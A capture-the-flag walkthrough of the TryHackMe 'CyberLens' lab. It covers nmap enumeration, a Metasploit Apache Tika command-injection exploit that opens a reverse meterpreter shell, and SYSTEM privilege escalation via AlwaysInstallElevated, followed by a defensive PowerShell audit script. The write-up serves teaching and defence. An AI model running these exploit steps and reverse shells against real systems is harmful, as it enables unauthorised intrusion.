# CyberLens

<div data-full-width="false"><figure><img src="/files/DcrNMbyY8albUioUQDOl" alt=""><figcaption></figcaption></figure></div>

{% embed url="https://tryhackme.com/r/room/cyberlensp6" %}

**Difficulty**: Easy

**Creator**: [Tyler Ramsbey](https://www.youtube.com/@TylerRamsbey)

**Tools**: Nmap, Metasploit

Add `cyberlens.thm` to the `/etc/hosts` file:

```bash
echo '10.10.252.163 cyberlens.thm' >> /etc/hosts
```

### Enumeration

I did not run nmap with the `-p-` option because I really needed to sleep, so I took a look at the website and its source code instead.

<figure><img src="/files/fb2tpJc9oaEcEll0rvFb" alt=""><figcaption></figcaption></figure>

Further down the page there is a `Get Metadata` button, so I checked its click event; it sends the request to the following:

<figure><img src="/files/8DydPpwrwZpV2EHFGRae" alt=""><figcaption></figcaption></figure>

`61777` is a rather unusual port, so I used `nmap` to find out what is listening on it:

```bash
$ nmap -sC -sV -p61777 -Pn cyberlens.thm
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-19 20:25 EDT
Nmap scan report for cyberlens.thm (10.10.252.163)
Host is up (0.25s latency).

PORT      STATE SERVICE VERSION
61777/tcp open  http    Jetty 8.y.z-SNAPSHOT
|_http-cors: HEAD GET
| http-methods: 
|_  Potentially risky methods: PUT
|_http-server-header: Jetty(8.y.z-SNAPSHOT)
|_http-title: Welcome to the Apache Tika 1.17 Server

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.05 seconds
```

There is clearly a web server running (Apache Tika 1.17 behind Jetty), so the first thing to do is look for a CVE for this version of Apache Tika with `searchsploit`:

```bash
$ searchsploit Apache Tika 1.17
------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                             |  Path
------------------------------------------------------------------------------------------- ---------------------------------
Apache Tika 1.15 - 1.17 - Header Command Injection (Metasploit)                            | windows/remote/47208.rb
Apache Tika-server < 1.18 - Command Injection                                              | windows/remote/46540.py
------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
```

Start Metasploit and search for a matching exploit module:

```bash
$ msfconsole -q 
msf6 > search type:exploit apache tika

Matching Modules
================

   #  Name                                          Disclosure Date  Rank       Check  Description
   -  ----                                          ---------------  ----       -----  -----------
   0  exploit/windows/http/apache_tika_jp2_jscript  2018-04-25       excellent  Yes    Apache Tika Header Command Injection


Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/http/apache_tika_jp2_jscript

msf6 > use exploit/windows/http/apache_tika_jp2_jscript
```

### Gaining access

Set the options:

* RHOST
* LHOST
* RPORT (61777)

Then launch the exploit with `run` (or `exploit`) and obtain a meterpreter session:

```bash
[*] Meterpreter session 1 opened (10.9.225.130:4444 -> 10.10.252.163:49945) at 2024-05-19 20:45:34 -0400

meterpreter > sysinfo 
Computer        : CYBERLENS
OS              : Windows Server 2019 (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows
meterpreter > 

```

The `user` flag is on the user's desktop:

```powershell
Directory of C:\Users\CyberLens\Desktop

06/06/2023  07:53 PM    <DIR>          .
06/06/2023  07:53 PM    <DIR>          ..
06/21/2016  03:36 PM               527 EC2 Feedback.website
06/21/2016  03:36 PM               554 EC2 Microsoft Windows Guide.website
06/06/2023  07:54 PM                25 user.txt <---
               3 File(s)          1,106 bytes
               2 Dir(s)  14,947,811,328 bytes free
```

### Privilege escalation

The target is a somewhat old build, so Metasploit has almost certainly indexed applicable local exploits in its database. I ran the `multi/recon/local_exploit_suggester` module, which found three vulnerabilities:

```bash
msf6 post(multi/recon/local_exploit_suggester) > sessions -l

Active sessions
===============

  Id  Name  Type                     Information                      Connection
  --  ----  ----                     -----------                      ----------
  1         meterpreter x86/windows  CYBERLENS\CyberLens @ CYBERLENS  10.9.225.130:4444 -> 10.10.252.163:49945 (10.10.252.163)

msf6 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf6 post(multi/recon/local_exploit_suggester) > run

[*] 10.10.252.163 - Collecting local exploits for x86/windows...
[*] 10.10.252.163 - 193 exploit checks are being tried...

...SNIP...

 1   exploit/windows/local/always_install_elevated                  Yes                      The target is vulnerable.
 2   exploit/windows/local/bypassuac_sluihijack                     Yes                      The target appears to be vulnerable.
 3   exploit/windows/local/cve_2020_1048_printerdemon               Yes                      The target appears to be vulnerable.
 4   exploit/windows/local/cve_2020_1337_printerdemon               Yes                      The target appears to be vulnerable.
 5   exploit/windows/local/ms16_032_secondary_logon_handle_privesc  Yes                      The service is running, but could not be validated.
```

We will start with the first one, setting the options:

* LHOST
* LPORT
* SESSION

```bash
msf6 exploit(windows/local/always_install_elevated) > set session 1
session => 1
msf6 exploit(windows/local/always_install_elevated) > set lhost 10.9.225.130
lhost => 10.9.225.130
msf6 exploit(windows/local/always_install_elevated) > set lport 4444
lport => 4444
msf6 exploit(windows/local/always_install_elevated) > run

[*] Started reverse TCP handler on 10.9.225.130:4444 
[*] Uploading the MSI to C:\Users\CYBERL~1\AppData\Local\Temp\1\bxmbsQXGgcxx.msi ...
[*] Executing MSI...
[*] Sending stage (176198 bytes) to 10.10.252.163
[+] Deleted C:\Users\CYBERL~1\AppData\Local\Temp\1\bxmbsQXGgcxx.msi
[*] Meterpreter session 2 opened (10.9.225.130:4444 -> 10.10.252.163:49950) at 2024-05-19 21:04:21 -0400

meterpreter > getuid 
Server username: NT AUTHORITY\SYSTEM
```
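The `always_install_elevated` module works only because the `AlwaysInstallElevated` Windows Installer policy is enabled for both the machine and the user, which makes every MSI run as SYSTEM. The following PowerShell script is an added example for the defender's side and is not part of the original writeup: it reports the state of the two policy values, tells you whether the host is exposed, optionally resets them to `0` (the same effect as disabling the "Always install with elevated privileges" Group Policy setting), and lists recent `MsiInstaller` events so an unexpected install like the one above can be spotted in the Application log.

```powershell
# Added example (not from the original writeup): audit and remediate the
# AlwaysInstallElevated policy abused by exploit/windows/local/always_install_elevated.
# The misconfiguration is exploitable only when BOTH the machine (HKLM) and the
# user (HKCU) policy values are set to 1.

$installerPolicyPaths = @(
    'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer',
    'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
)

function Get-AlwaysInstallElevatedState {
    # One row per hive; a missing key or value counts as "not set" (safe).
    foreach ($path in $installerPolicyPaths) {
        $value = (Get-ItemProperty -Path $path -Name AlwaysInstallElevated -ErrorAction SilentlyContinue).AlwaysInstallElevated
        [pscustomobject]@{
            Path  = $path
            Value = if ($null -eq $value) { 'not set' } else { $value }
        }
    }
}

function Test-AlwaysInstallElevated {
    # True only when every hive reports 1, i.e. the host is exploitable.
    $enabled = @(Get-AlwaysInstallElevatedState | Where-Object { $_.Value -eq 1 })
    return $enabled.Count -eq $installerPolicyPaths.Count
}

function Disable-AlwaysInstallElevated {
    # Requires an elevated shell for the HKLM key. Setting the value to 0 matches
    # the GPO "Windows Installer > Always install with elevated privileges: Disabled".
    foreach ($path in $installerPolicyPaths) {
        if (Test-Path $path) {
            Set-ItemProperty -Path $path -Name AlwaysInstallElevated -Value 0 -Type DWord
        }
    }
}

Get-AlwaysInstallElevatedState | Format-Table -AutoSize
if (Test-AlwaysInstallElevated) {
    Write-Warning 'AlwaysInstallElevated is enabled in both hives: any user can install an MSI as SYSTEM.'
    # Uncomment to remediate on the spot:
    # Disable-AlwaysInstallElevated
} else {
    Write-Host 'AlwaysInstallElevated is not exploitable on this host.'
}

# Detection: MSI installs land in the Application log under the MsiInstaller provider
# (1033 = product installed, 11707 = installation completed successfully). An install
# run by a standard user from a Temp directory, as in the session above, is a red flag.
Get-WinEvent -FilterHashtable @{ LogName = 'Application'; ProviderName = 'MsiInstaller'; Id = 1033, 11707 } -MaxEvents 20 -ErrorAction SilentlyContinue |
    Select-Object TimeCreated, Id, UserId, Message |
    Format-Table -Wrap
```

Run it in a normal shell to audit; run it elevated if you want `Disable-AlwaysInstallElevated` to be able to write the HKLM value. In a domain, prefer fixing the setting through Group Policy so it cannot be re-enabled locally.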

The root flag is on the Administrator's desktop:

```powershell
Directory of C:\Users\Administrator\Desktop

06/06/2023  07:45 PM    <DIR>          .
06/06/2023  07:45 PM    <DIR>          ..
11/27/2023  07:50 PM                24 admin.txt <----
06/21/2016  03:36 PM               527 EC2 Feedback.website
06/21/2016  03:36 PM               554 EC2 Microsoft Windows Guide.website
               3 File(s)          1,105 bytes
               2 Dir(s)  14,947,409,920 bytes free

C:\Users\Administrator\Desktop>
```
